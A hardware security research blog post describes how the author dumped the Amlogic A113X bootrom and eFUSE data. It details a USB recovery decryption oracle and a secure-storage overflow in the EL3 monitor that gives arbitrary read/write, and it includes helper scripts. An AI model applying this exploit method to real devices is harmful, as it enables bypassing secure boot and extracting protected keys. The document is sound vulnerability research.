Dumping the Amlogic A113X Bootrom

2022-12-01

[+] Introduction

While investigating the Sonos One (2nd generation) smart speaker for a potential entry into the Pwn2Own 2022 Toronto competition I got slightly (ahem) sidetracked in a small adventure relating to the bootchain of the AMLogic A113 family of chips.

This work was inspired by Frederic B’s work on AMLogic SoCs. Make sure to check out his awesome blogposts.

To quote the marketing blurb from AMLogic themselves:

With the strong computing capability of quad-core 64-bit CPU architecture, A113X can support the mainstream far-field voice recognition solutions without external DSP chip. A113X can support 8-channel PDM and multi-channel I2S. With flexible microphone array and audio input and output interfaces, A113X is a perfect choice for smart speakers and smart home applications.

The Sonos One (gen2) is based around the A113D SoC. The bootchain is surprisingly well protected. It uses the “secure boot” functionality the SoC offers, meaning all bootloader stages are encrypted and have an RSA signature attached to it. The encryption keys for these bootloaders sit in a eFUSE array that can’t (normally) be read, even by privileged (kernel) code. The U-boot that (nowadays) ships with these devices has been locked down and is protected by a password.

[+] Target board

Like mentioned in the last paragraph, the Sonos One is not a very good board for experimentation with the A113 secure boot chain in general. I looked around for a cheap locally available alternative for experimentation and stumbled accross the Lenovo Smart Clock Essential. It’s a silly little “smart clock” that (at the time) was available for ~50 EUR locally. After (finally) managing to disassemble the device I was eventually able to identify some testpoints for the UART.

Luckily, the Lenovo Clock was a bit less aggressively protected than the Sonos One. For one, the U-boot boot process can be interrupted by sending some bytes over the UART, allowing you to break into a U-boot shell. Secondly, the OTP/eFUSE on the Lenovo Clocks are configured in a way that does not disable the USB boot protocol of the bootROM.

The Lenovo Clock runs a Linux/Android based OS image. After comprehending the U-boot environment variables/scripts a bit I was able to come up with the following basic recipe to boot the thing and drop into a root shell:

setenv adb_setting run set_adb_debuggable
run preboot
run bootcmd

We’re not really interested in any of the Linux stuff, but this provided a simple way to copy out the /dev/mtd partitions to a USB mass storage device (the thing has a USB port) without having to hotair the NAND flash off or dump the flash over serial through some U-boot trickery.

After dumping the flash I learnt that even though the Lenovo U-Boot isn’t locked down, they do infact make use of the AMLogic provided “secure boot” functionality.

This means all the bootloaders reside encrypted on the flash and their integrity is ensured by means of verifying a RSA signature.

[+] A113X Recon

Finding a datasheet/reference manual for the gritty details of the A113X was surprisingly hard. Typically these are only supplied to vendors who buy their chips for implementation of their products. Luckily, with some sleuthing I was able to find a chinese “document sharing” webpage where it could be obtained.. first I had to farm some credits though by uploading some (unique) documents myself. After uploading a few (publically available) AMLogic datasheets I was able to get the (non publically available) datasheet in return. It happens to have a Xiaomi watermark, thanks anonymous Xiaomi (affiliated) engineer who decided to violate his NDA!

[+] ARM Trusted Firmware TL;DR

Before we move on, let’s have a quick look at a dumbed down overview of the boot path of a platform that follows the reference Arm Trusted Firmware reference implementation (from here on abbreviated as ATF), like the AMLogic A113X does. We’ll ignore things like the SCP (System Control Processor) for now (although it would make an interesting subject for a follow-up post) and focus on the things running on the Application Processor.

As we can see from my poorly drawn diagram, upon reset of the system execution starts in BL1, the BootROM. The BootROM will chainload BL2, which in turn will load the various BL3 stages. BL31 is the Secure Monitor code running in the highest privilege level known as EL3. BL32 is the secure-EL1 payload, on the target we’re exploring there is no BL32 payload.

The first piece of “untrusted” code that lives outside of the secure world is BL33. Typically this is where you will a find bootloader such as U-boot which in turn will chainload something like Linux.

Our goal for today is to compromise the EL3 secure monitor by running code from the untrusted (“normal world”) context!

[+] AMLogic USB recovery mode

From various online sources and by reading Frederic’s work I learnt a bit about the general boot flow of AMLogic SoCs. The USB Recovery Mode is especially interesting, as it can be interfaced with from any USB host. There are some opensource efforts of documenting and implementing this USB Recovery Mode protocol, and otherwise there’s some closed source utilities provided by AMLogic themselves.

The BootROM will check two “boot strap” pins (POC1, POC2) to determine in which order it will probe the various methods of booting the system. The following flowchart illustrates this:

The goal of all of the various boot methods is to load the next stage bootloader into memory and start running it. The next stage bootloader is called BL2. When secure boot is enforced (like on the Lenovo and Sonos target boards we have) it will only let us load correctly encrypted and signed BL2 binaries. Of course we lack the required encryption keys for encryption and private keys for signing.

By studying pyamlboot and the official aml-flash-tool binaries I was able to learn a bit about the USB protocol that is used for talking to the USB recovery code.

The USB recovery protocol uses regular USB control transfers and supports a handful of commands. The command opcode is put in bRequest of the control transfer packet(s) and things like addresses/offsets are typically sliced into two 16bit halves and stuffed into the wValue and wIndex fields. If those are foreign/alien words to you and you want to learn more about the nitty gritty details of the cursed technology that is known as USB.. I kindly refer you to USB in a nutshell.

Since we don’t have access to the bootROM code, we cannot study the actual implementation. Instead, we’ll rely on publically available tools/code and some good old blackbox testing.

PyAMLBoot gives us the following table of available commands:

REQ_WRITE_MEM   = 0x01
REQ_READ_MEM    = 0x02
REQ_FILL_MEM    = 0x03
REQ_MODIFY_MEM  = 0x04
REQ_RUN_IN_ADDR = 0x05
REQ_WRITE_AUX   = 0x06
REQ_READ_AUX    = 0x07

The *_MEM operations allow for reading/writing into (restricted ranges) of SRAM. The REQ_RUN_IN_ADDR operation starts decryption and verification of the BL2 image at a specified address. If verification succeeds it will jump into the BL2 entrypoint. REQ_READ_AUX and REQ_WRITE_AUX can be used to peek/poke (restricted ranges) of memory mapped IO.

[+] Secure Boot Decryption Oracle

When loading a BL2 image over USB what you do is load the BL2 image data to SRAM in chunks of 64 bytes using the REQ_WRITE_MEM command. After sending the final chunk you send a REQ_RUN_IN_ADDR command with the SRAM base address of the BL2 image that you just loaded to kick off decryption + validation + execution.

During some blackbox fiddling with this procedure I quickly noticed a funny oversight in the behavior of REQ_RUN_IN_ADDR. The decryption of the data placed in SRAM happens in-place, and when the signature verification fails it does not bother to clear out the decrypted contents in SRAM. After a failed REQ_RUN_IN_ADDR command we are still able to follow up with additional commands, and thus we can use the REQ_READ_MEM command to read back decrypted contents! Essentially, this gives us a decryption oracle for BL2 images and any other data that is encrypted with the same algorithm/key.

Some more blackbox poking of this interface revealed the encryption is a block cipher with a block size of 16 bytes and it exhibits properties of a block cipher used in CBC mode.

Using this little trick, I corrupted some trailing bytes of a known-valid BL2 image I got from my NAND dump (which resides at the very start of mtd0) to make signature verification fail, and was able to dump the decrypted BL2 code/data for further static analysis.

[+] Reversing BL2

BL2 is responsible for loading BL31 and BL33. BL31 runs in the highest privilege context in secure world known as EL3. BL33 runs in the normal world, and typically consists of a bootloader like U-boot, which in turn will chainload something like Linux.

If we look at the UART log output from BL2 we can see:

Load FIP HDR from NAND, src: 0x0000c000, des: 0x01700000, size: 0x00004000, part: 0
Load BL3x from NAND, src: 0x00010000, des: 0x01704000, size: 0x000b0e00, part: 0
NOTICE:  BL31: v1.3(release):d3a620ec3
NOTICE:  BL31: Built : 10:32:40, Jan 20 2021
NOTICE:  BL31: AXG secure boot!
NOTICE:  BL31: BL33 decompress pass

The ‘FIP HDR’ is a table containing offsets/sizes for the various BL3x blobs. Each entry in this table has size 0x28 with a maximum of 32 entries. The layout of an entry is:

uint8_t uuid[0x10]
uint64_t offset
uint64_t size
uint64_t flags

Using the decryption oracle we used to decrypt BL2 we can also decrypt the FIP table + all BL3x data. Next, we can parse the FIP and extract the individual chunks using a simple script:

#!/usr/bin/env/python

import sys
import struct
import binascii

FIP_ENTRY_COUNT_MAX = 32
FIP_ENTRY_SIZE = 0x28

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("usage: %s <input.bin> <outputdir>" % sys.argv[0])
        exit(0)

    input_filename, output_dir = sys.argv[1:]

    d = open(input_filename, "rb").read()[0x10:]
    fip_hdr = struct.unpack("<LLQ", d[0:0x10])

    assert(fip_hdr[0] == 0xaa640001)
    assert(fip_hdr[1] == 0x12345678)

    for i in range(FIP_ENTRY_COUNT_MAX):
        offs = 0x10 + (i * FIP_ENTRY_SIZE)
        entry = d[offs:offs+FIP_ENTRY_SIZE]
        offs, size, flags = struct.unpack("<QQQ", entry[0x10:])
        uuid = entry[0:0x10]

        if uuid == b"\x00"*16: break

        uuid_str = binascii.hexlify(uuid).decode()

        print("entry #%02d: %s - offs: %08x, size: %08x, flags: %x" % (
            i, uuid_str, offs, size, flags
        ))

        if size == 0: continue

        output_filename = "%s/%02d_%08x_%s" % (
            output_dir, i, offs, uuid_str
        )

        with open(output_filename, "wb") as fh:
            fh.write(d[offs:offs+size])

$ python3 fip.py mtd1.out fip_out
#00: 9766fd3d89bee849ae5d78a140608213 - offs: 00004000, size: 0000d800
#01: 47d4086d4cfe98469b952950cbbd5a00 - offs: 00011800, size: 00031600
#02: 05d0e18953dc13478d2b500a4b7a3e38 - offs: 00042e00, size: 00000000
#03: d6d0eea7fcead54b97829934f234b6e4 - offs: 00042e00, size: 00072000
#04: f41d1486cb95e6118488842b2b01ca38 - offs: 00000188, size: 00000468
#05: 4856ccc2cc85e611a5363c970e97a0ee - offs: 000005f0, size: 00000468

Examining the extracted chunks we observe that:

UUID 9766fd3d89bee849ae5d78a140608213 = BL30
UUID 47d4086d4cfe98469b952950cbbd5a00 = BL31
UUID 05d0e18953dc13478d2b500a4b7a3e38 = empty (unused BL32 slot)
UUID d6d0eea7fcead54b97829934f234b6e4 = BL33
UUID f41d1486cb95e6118488842b2b01ca38 = metadata
UUID 4856ccc2cc85e611a5363c970e97a0ee = metadata

Great! We now have the plaintext blobs for BL31 (the EL3 secure monitor) and BL33 (U-boot)!

[+] Reversing BL31

Our goal is to dump the BootROM and eFUSE/OTP data. So we’ll need to find a way to get code running in the context of the EL3 secure monitor (BL31). I started studying the open source ATF reference implementation.

The documentation on ‘Arm SiP Services’ mentions:

SiP services are non-standard, platform-specific services offered by the silicon implementer or platform provider. They are accessed via SMC (“SMC calls”) instruction executed from Exception Levels below EL3.

This sounds like a great spot to start hunting for bugs. It involves vendor specific code that deviates from the open source reference implementation, and it can be reached from the “normal world” by invoking SMC (Secure Monitor Call) instructions.

By reading the ATF code we learn that SMC calls are divided up into “services”, of which SiP is one. These services are registered from a table of rt_svc_desc entries. These service descriptors contain (amongst other things) a name for the service and two function pointers, one for initialization (init) and another one for handling the actual secure monitor calls (handle). The SiP service is conveniently called sip_svc, so by following some references to this string constant I was quickly able to find the SiP SMC routine dispatcher.

I expected to maybe identify a handful of vendor specific SMC functions, but to my surprise there was a total of 115 of them. The handle function contains a big switch case for the various vendor specific SMC ID’s and dispatches their functionality by looking up a function pointer in a big table that I call platform_ops. The platform_ops pointer is initialized by the SiP service init function and resides in the .data section of the EL3 code.

115 routines (not to mention all the subroutines they call into) is quite a bit of tedious reversing work. Luckily, a lot of it is boilerplate stuff like routines that simply return a pointer for where the shared memory buffers reside, and such. Quite a few entries in the platform_ops table were also NULL pointers, making the SiP SMC dispatcher bail if you tried to invoke any of these. After culling through it a bit we’re left with routines pertaining to (surprise) cryptographic operations, limited access to OTP/eFUSE data and a whole cluster of routines related to some “secure storage” facility.

[+] Secure Storage

The “secure storage” functionality facilitates a way of having key/value pairs encrypted with an AES key that is never visible to the normal world.

Linux (or any other OS running in EL2) can query the secure storage, and read/write items to/from this storage using these vendor specific SMC calls.

Reversing the storage related routines reveals the following core functions that can be invoked through the SMC interface:

SMC 0x82000069 - SIP_CMD_STORAGE_PARSE:

This routine is used to parse an (encrypted) secure storage blob, it is invoked before you can actually read or write items from the storage.

SMC 0x82000061 - SIP_CMD_STORAGE_READ:

This routine is used to read an item from the secure storage. The name of the item is included in the request body.

SMC 0x82000062 - SIP_CMD_STORAGE_WRITE:

This routine is used to write/update an item in the secure storage.

SMC 0x82000068 - SIP_CMD_STORAGE_REMOVE:

This routine is used to remove an item from the secure storage.

SMC 0x82000067 - SIP_CMD_STORAGE_LIST:

This routine is used to get a list of all items (names) in the secure storage.

To start using this secure storage we SIP_CMD_STORAGE_PARSE, which accepts a single argument that contains the size of the encrypted storage blob. The actual encrypted storage blob to be parsed is written to a shared memory buffer residing in DRAM. The address of this shared buffer is fixed and can be retrieved using SMC 0x82000025, this address is 0x5080000.

The maximum size accepted by the SIP_CMD_STORAGE_PARSE handler is 0x40000 bytes. The storage starts with a plaintext header of size 0x200 that looks like this:

struct {
    uint8_t  magic[0x10];
    uint32_t key_version;
    uint32_t seed_mode;
    uint8_t  body_hash[0x20];
    uint8_t  padding[];
}

Following the header we fill find the encrypted body containing the storage items. If the key_version field contains a value greater than 0 it will compute a SHA256 digest over the encrypted body and compare it to the value in body_hash. If it doesn’t match, it will bail from the remainder of the parsing logic.

Next, the parsing routine will initially only decrypt the first 0x200 bytes of the encrypted body using AES-256 in CBC mode. We will call this first 0x200 sized block the param block. Depending on the value of seed_mode it will construct the AES key and IV being used in the following way:

seed_mode = 1:

error, invalid

seed_mode = 2:

AES key = a hardcoded value from the .data section of the EL3 code
AES IV = all zeroes

seed_mode = anything else:

AES key = 12 byte CPUID from the eFUSE/OTP concatenated with a fixed 20 byte value from the .data section
AES IV = 12 byte CPUID from the eFUSE/OTP concatenated with a fixed 4 byte value from the .data section

This is great, even without any knowledge of the CPUID value (though its easy to recover/grab) we can now encrypt our own arbitrarily constructed “secure storage” blobs and feed them to the parser!

The param block contains a list of (nested) TLV (Type-Length-Value) entries which are used to describe some properties of the remaining body data. Every TLV entry is structured as a 32bit type, followed by a 32bit size, followed by size bytes of data.

The outer TLV is one of type 0x1 TYPE_PARAM_HEADER, the inner body is a single TLV with type 0x2 TYPE_ENCRYPTED_SIZE specifying the size of the rest of the body.

Following the param block we have the actual key entries which are also encoded as a list of nested TLVs.

A key entry always starts with a TLV of type TYPE_KEY_DEFINITION (0x3). The body of this TLV contains multiple TLVs describing the properties of this key entry. Possible type values for a KEY_DEFINITION are:

Type	Name	Description
0x4	`NAME_SIZE`	the length of the name
0x5	`NAME_DATA`	the actual name
0x6	`VALUE_SIZE`	the length of the value
0x7	`VALUE_DATA`	the actual value
0x8	`KEY_TYPE`	a 32bit value indicating the “type” of value
0x9	`BUFFER_STATUS`	a 32bit value indicating whether the value is “dirty”
0xa	`HASH_DATA`	a 0x20 byte SHA256 digest over the value data.

The KEY_DEFINITION entries that are correctly formed get stored internally in an array of key_entry entries that resides in the EL3 .bss, with a maximum 64 entries. The structure of a key_entry looks like this:

// sizeof(key_entry) == 0x90
struct key_entry {
    uint8_t  name[80];
    uint32_t name_len;
    uint32_t buffer_status;
    uint32_t key_type;
    uint32_t value_size;
    uint8_t  *value_ptr;
    uint8_t  hash[0x20];
    uint32_t key_in_use;
    uint32_t unknown;
}

the key_in_use value specifies whether a key entry is valid or not, and gets set after comparing the SHA256 digest of the value against the hash.

[+] Pwning BL31

The loop in the parser code for filling this array of key_entry values looks roughly like this:

uint32_t key_entry_size_out;
g_keys_count = 0;
while (encrypted_size) {
    key_out = &g_keys[g_keys_count];
    if (parse_key(keyheap_ptr, key_out, &key_entry_size_out)) {
        goto ERROR_BAIL;
    }

    sha256(key_out->value_ptr, key_out->value_size, value_hash);
    key_hash = key_out->key_hash;
    if (!memcmp(key_hash, value_hash, 32)) {
        key_out->key_in_use = 1;
        ++g_keys_count;
    } else {
        key_out->key_in_use = 1;
    }

    keyheap_ptr = keyheap_ptr + key_entry_size_out;
    encrypted_size -= key_entry_size_out;
}

One obvious issue that immediately stands out is that there is no upper limit on g_keys_count being enforced leading to an overflow of g_keys, which is the array of key_entry structs. Looks like a promising bug!

Initially I tried to get code execution by using this overflow to overwrite the pointer to platform_ops at the end of .data. But doing this required about.. ~3740 key_entry objects, destroying a lot of pointers/data along the way with uncontrolled data due to unfortunate alignment of certain key_entry struct members.

I studied the memory layout a bit more carefully:

0000: uint32_t  g_keys_count;
0004: key_entry g_keys[64];
2404: uint64_t  g_key_version;
240c: uint8_t   param_sector_decrypted[0x200];

There was a scratch buffer for the decrypted param block neighboring the keys array. So if we add more than 64 entries to our storage blob that is being parsed we can overwrite this scratch buffer .. that is not actually used anymore at that point. So how is this useful? The key_entry objects it will write there will be sane enough that it doesn’t really gain us anything.

If we look at the implementation of SIP_CMD_STORAGE_READ and SIP_CMD_STORAGE_WRITE we notice they both look up the corresponding key_entry by a given name. The function that does this looks like this:

int key_find_by_name(void *key_name, unsigned int match_len)
{
  int key_index;
  key_entry *current_key;

  key_index = 0;
  while (1) {
    if (key_index > g_keys_count) {
      return 0xFFFFFFFFLL;
    }
    current_key = &g_keys[key_index];
    if ( (current_key->key_in_use & 1) != 0
      && current_key->name_len == match_len
      && !(unsigned int)memcmp(&g_keys[key_index], key_name, match_len)) {
      break;
    }
    ++key_index;
  }
  return key_index;
}

This routine has a tiny but interesting quirk: rather than assuming the maximum index into the g_keys is min(g_keys_count, 64) it assumes g_keys_count is always within bounds of the maximum capacity of g_keys.

Let’s study (majorly trimmed down version of) the parsing function a bit more:

int parse_storage() {
    g_seed_mode = -1;
    g_key_version = -1;
    int param_parsed[2];

    if (strcmp(header.magic, "AMLSECURITY")) {
        goto ERROR_BAIL;
    }

    g_seed_mode = header.seed_mode;
    g_key_version = header.key_version;

    decrypt(param_sector_encrypted, param_sector_decrypted, 0x200);

    if (!parse_param_sector(param_sector_decrypted, param_parsed)) {}
        reset_key_heap();
        memset(g_keys, 0, sizeof(key_entry) * 64);
        return 0;
    }

    g_keys_count = 0;

    decrypt(storage_body_enc, storage_body_dec, storage_body_size);

    while(encrypted_size) {
        // .. key parsing logic
    }
}

If we invoke SIP_CMD_STORAGE_PARSE a second time we can control what ends up in the param_sector_decrypted scratch buffer. Effectively this lets us forge arbitrary key_entry objects. The problem is.. invoking SIP_CMD_STORAGE_PARSE a second time will reset g_keys_count to be 0.. unless we make parse_param_sector fail; then all it will do is wipe g_keys (but only for its original maximum capacity of 64 entries), and leave g_keys_count alone! This means that keys with indices of 64 and higher will overlap with the param_sector_decrypted buffer.

Lets examine the logic of parse_param_sector:

typedef struct {
    uint32_t encrypted_size;
    uint32_t type_11_val;
} param_block_t;

int parse_param_sector(uint8_t *param_sector_buf, param_block_t *out) {
    int result;
    int remaining;

    tlv_t *tlv_root = (tlv_t*)param_sector_buf;
    uint8_t *p = (param_sector_buf + 8);

    remaining = tlv_root->size;
    result = 0xFFFFFFFF;

    if ( tlv_root->type == 1 ) {
        while (remaining) {
            tlv_t *tlv_next = (tlv_t*)p;
            remaining -= (tlv_next->size + 8);
            if (tlv_next->type == 2) {
                out->encrypted_size = *(uint32_t*)(p + 8);
            } else if (tlv_next->type == 11 ) {
                out->type_11_val = *(uint32_t*)(p + 8);
            }
            p += (tlv_next->size + 8);
        }
        return 0;
    }

    return result;
}

As we can see it parses a nested TLV structure that needs to start with a TLV that has type 0x1 (I call this TYPE_PARAM_BLOCK_START). if it does not.. it will return an error code. Simple!

The first key index that (partially) overlaps with param_sector_decrypted is 64, but the initial 8 bytes are occupied by the value of g_key_version, which is is overwritten when we trigger storage parsing the second time. While still usable, for convenience sake lets put the forged key_entry we care about into the next slot (index 65) since it fully overlaps with controlled data from param_sector_decrypted.

Our forged key_entry will look like this:

Offset	Field	Value
0x00	name	“XXXX”
0x50	name_len	4
0x54	buffer_status	0
0x58	key_type	0
0x5c	value_size	8
0x60	value_ptr	ANY_POINTER_WE_LIKE
0x68	hash	0x00 * 32
0x88	key_in_use	1
0x8c	unknown	0

Now, if we trigger a SIP_CMD_STORAGE_READ operation requesting to read the value of the storage item with name XXXX it will traverse the g_keys array until it reaches our forged key_entry object and will copy key_entry.value_size (8) bytes from key_entry.value_ptr to the output buffer in shared memory, from where we can retrieve it. This gives us an arbitrary read64 primitive!

We can use exactly the same approach, but instead with SIP_CMD_STORAGE_WRITE to get an arbitrary write64 primitive.

Using our write64 primitive we can finally overwrite the pointer to platform_ops to hijack the function pointer table of the SiP SMC dispatcher.

[+] Dumping the eFUSE/OTP data

So we have some control flow hijacking in the secure monitor. What’s next? Let’s try to dump the eFUSE/OTP data somehow.

Let us start by slightly upgrading our set of primitives. the SiP SMC dispatcher will invoke the correct function pointer from the platform_ops table depending on the SMC ID and call this function with the right amount of arguments that were originally passed to the SMC. I noticed SMC 0x820000FF will pass the original SMC arguments (X1, X2, X3, X4) into the handler for SMC 0x820000FF as-is (X0, X1, X2, X3).

So hijacking this entry in the platform_ops table while leaving the rest untouched will give us an arbitrary call4 (function call with up to 4 controlled arguments) primitive when invoking SMC 0x820000FF.

During reversing I already identified the EL3 code that reads data from the OTP. This works by sending a SCPI message (command 0x8000C2 to be precise) to the SCP (System Control Processor) using some mailbox MMIO interface. We don’t have to reimplement this of course, we just call4 the convenience function that does this for us.

The prototype for this function is:

int aml_scpi_cmd_efuse_read(void *out, uint32_t offset, uint32_t size);

so, in order to dump the eFUSE/OTP data using our EL3 SMC exploit, we can just: call4(aml_scpi_cmd_efuse_read, SOME_DRAM_ADDRESS, 0, 0x100)

And afterwards we just read it back from DRAM from the “normal world”. :-)

[+] Dumping the BootROM

We’re almost done, but a copy of the application processor’s BootROM would be nice to have now we’re able to run code in this privileged context. From the (leaked) A113X datasheet we can learn that the physical address of the BootROM is 0xffff0000.

However, we can’t simply read it from EL3 because BL31 configured the MMU and there is no VA -> PA 0xffff0000 mapping we can read from. Let’s learn a bit about MMU setup and the page tables.

The intricate details of the Aarch64 memory model are quite involved, we’re only going to try and understand the bare minimum amount of details needed to patch up the existing configuration/page tables so we can dump the ROM. ;-)

In EL3 the level 1 page table address is configured by writing to the special register TTBR0_EL3 (the Translation Table Base Register 0 for EL3) using the MSR instruction. Another important special register is TCR_EL3 (the Translation Control Register for EL3), which configures things like the page granule and size of the address space.

If we follow the ATF code (and BL31 disassembly) we will find the routine enable_mmu_el3 which contains the following writes to these special registers:

TCR_EL3 = 0x80803520
TTBR0_EL3 = base_xlation_table

0x80803520 corresponds to the following settings for TCR_EL3:

Bits	Field	Value
0:5	T0SZ	0x20
6:7	IRGN0	1
8:9	ORGN0	1
12:13	SH0	3
14:15	TG0	0 = 4KiB page granule
16:18	PS	0
20	TBI	0 = Top Byte used in the address calculation.

The size of the address space can be calculated by doing 64 - T0SZ. So in this case we have a 32bit address space. With a 4KiB granule and a 32bit address space there is no level 0 page table, we start at level 1. The level 1 page table index bits are bits 30 up till (and including) bit 38. For a 32bit address this means it will only be indexed with bit 30 and 31 giving us a level 1 page table size of exactly 4 entries. Each entry spans 1GiB (0x40000000).

if we dump the level-1 page table by reading 32 bytes bytes from the address written to TTBR0_EL3, we see:

0x00000000051c6003
0x0000000000000000
0x0000000000000000
0x00000000051c9003

the lower 2 bits of the entries in the table describe the type of address they point to. Any entry which does not have bit0 set is considered invalid. The first and last entry have a value of 0x3 for the lower 2 bits, which means they are addressess pointing to a the next level’s table address.

Level-2 page tables are indexed using bits 21:29 (9 bits) of the virtual address. Since we’re interested in the address 0xffff0000 we can calculate the index into the table by taking bits 21:29 which is 0x1ff. every entry in the level-2 table spans a region of 2MiB, so entry 0x1ff covers ffe00000-ffffffff.

at 0x51c9000 + (0x1ff * 8) we find the value 0x51cd003 which is the address of the level-3 pagetable. At the level-3 pagetable no more indirection is allowed. Every 64bit value in a level3 table describes the mapping of a 4KiB page.

A level3 descriptor value is structured like this:

Bits	Field	notes
52:63	UPAT	Upper Page Attributes
40:51	RES0	Should be zeroed
12:39	ADDR	Address bits 12-39
2:11	LPAT	Lower Page Attributes
0:1	reserved	always 0x3 (0b11)

the upper page attributes consist out of 3 single-bit properties (ignoring any reserved bits): the contiguous hint bit (52), the PXN bit (53) and the XN bit (54).

We don’t really care about enforcing XN (eXecute Never) or PXN (Privileged eXecute Never), and we don’t have to set the contiguous hint bit either for the page table entries we’re about to introduce, so our UPAT value is zero.

The lower page attributes (10bits) are a bit more involved and are structured like this:

The attrindex bit 0 needs to match the correct index for the MAIRn (Memory Attribute Indirection Registers) register that has been configured. In enable_mmu_el3 they configure MAIR1, so we use the an attrindex value of 0b001.

The ns bit is the Non-Secure bit, since we’ll be dumping the ROM using our privileged read64 primitive we can simply leave this set to 0.

The two ap field in the entry maps to the page access permissions as per the AP[2:1] access permission model. Again, since we’re only going to access this region with our privileged read64 primitive, it is safe to set these bits to 0, making the entry R/W for our privilege level.

The sh field is used to specify the “shareability” attributes of this page. we’ll specify a value of 0b10 here (Outer Shareable), so any processor, core and peripheral can access this. (Although that isn’t strictly nescessary of course)

The af bit we’ll set to 1 for reasons I never bothered to fully comprehend. Finally, the nG (not-Global) bit indicates if an entry is global or not, we’ll leave this bit cleared to mark it as global.

We end up with a LPAT value of 0x181.

Putting it all together, we can construct our page table entries by doing:

(addr & 0xfffff000) | (0x181 << 2) | 3

We don’t exactly know (yet) how big the BootROM is, but we can start by mapping 64KiB worth of pages starting at 0xffff0000 and see how far that gets us. To calculate the index into the L3 page table we’re patching we can simply do (addr - 0xffe00000) / 0x1000, and of course multiply this index by 8 if we want the byte offset (remember every pagetable entry is 64bits).

Let’s summarize in a simple to follow python snippet:

#!/usr/bin/env python

LPAT = 0x181
UPAT = 0

tbl_start = 0xffe00000
map_start = 0xffff0000
map_end = map_start + (1024 * 64)

for addr in range(map_start, map_end, 0x1000):
    index = (addr - tbl_start) // 0x1000
    entry = (addr & 0xfffff000) | (UPAT << 52) | (LPAT << 2) | 3
    print("write64(L3_TABLE + 0x%04x, 0x%016x)" % (index * 8, entry))

This will give us a list of 64bit writes we need in order to map (1:1, identity-mapped, VA=PA) the BootROM region. Afterwards, we simply use our read64 primitive to dump the entire 64KiB region to a file. Of course we could have easily upgraded the read64 primitive to something that allows us to read data faster, so it takes a minute or so to dump the full 64KiB for us.. but who would mind a little suspense after all this work? ;-)

After examining the result data we got we can quickly notice some repeating strings and we can conclude the image loops after 0x8000 bytes. So the actual size of the ROM is 32KiB.

$ sha256sum a113x_bootrom.bin
7d1f63f6ddec05f538243aaa532c0503517de8ce9d2033d2b36b6c79695be626  a113x_bootrom.bin

[+] Closing Words & What’s next?

You made it this far!

I started writing this post back in December.. but documenting stuff for the public is always much less exciting than working on new stuff, bla bla bla.

Anyway, I hope you enjoyed the read! Feel free to reach out to point out any inconsistencies. The EL3 exploit described in this post applies to both the Lenovo Smart Clock (AMLogic A113X SoC) as well as the Sonos One gen2 (AMLogic A113D SoC). The exploit was initially prototyped on the Lenovo clock from an U-boot context and was later ported to the Sonos One to a Linux userland context (assisted by a custom kernel module). All of this code can be found on Github.

It would be great if some exploit could be found in the a113x/d bootrom. I did some cursory RE work to quickly check if the amlogic-usbdl bug is also present in the a113x bootrom, but it looks like that is not the case. (feel free to double check, of course :-))

Even if such a bug was present it would be useless for permanently jailbreaking the Sonos One gen2 though, since they blow the eFUSE which disabled the USB recovery stuff in the BootROM all together. :-(

There will be a follow up post describing some Sonos specific stuff like their flash encryption and OTA update encryption, stay tuned!